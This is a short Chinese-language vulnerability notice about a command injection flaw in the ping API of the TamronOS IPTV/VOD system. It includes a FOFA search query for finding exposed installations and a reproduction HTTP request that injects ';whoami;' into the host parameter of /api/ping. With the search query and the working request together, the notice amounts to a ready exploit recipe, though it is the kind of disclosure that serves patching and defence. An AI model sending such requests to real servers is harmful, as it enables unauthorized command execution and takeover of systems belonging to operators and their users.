TamronOS IPTV系统ping存在命令执行漏洞
一、漏洞简介
TamronOS IPTV/VOD系统是一套基于Linux内核开发的宽带运营商、酒店、学校直播点播一体解决方案。系统提供了多种客户端(Android机顶盒、电视、PC版点播、手机版点播)方便用户通过不同的设备接入。TamronOS IPTV系统ping存在命令执行漏洞,攻击者可通过该漏洞获取服务器权限。
二、影响版本
- TamronOS IPTV系统
三、资产测绘
- fofa
app="TamronOS-IPTV系统" - 特征
四、漏洞复现
POST /api/ping?count=5&host=;whoami; HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/41.0.887.0 Safari/532.1
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 0
Connection: close
